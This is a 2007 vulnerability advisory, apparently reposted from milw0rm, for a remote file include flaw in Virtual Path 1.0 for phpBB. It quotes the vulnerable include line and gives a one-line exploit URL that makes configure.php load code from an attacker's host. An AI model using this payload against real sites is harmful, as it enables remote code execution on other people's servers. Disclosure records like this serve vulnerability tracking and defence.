Virtual Path 1.0 (vp/configure.php) Remote File Include Vulnerability

2007-01-29T00:00:00
ID SECURITYVULNS:DOC:15896
Type securityvulns
Reporter Securityvulns
Modified 2007-01-29T00:00:00

Description

+===================================================================== + Virtual Path phpBB <== v1.0 | +===================================================================== + Downlaoad S :http://sourceforge.net/projects/virtualpath/ | +===================================================================== + Author: GolD_M = Mahmood_ali && Contact: HackEr_@W.Cn | ====================================================================== + SpeciaL GreeTz : Tryag-Team & 4lKaSrGoLd3n-Team | +===================================================================== + In: /vp/configure.php | +===================================================================== + Vulnerable Code: & Line : 3 | +===================================================================== + include_once($phpbb_root_path. 'vp/conf.php'); | +===================================================================== + Exploit: | +===================================================================== + http://Victim.Com/vp/configure.php?phpbb_root_path=Evil? | +===================================================================== + Tryag.Com & Dwrat.com | +=====================================================================

milw0rm.com [2007-01-25]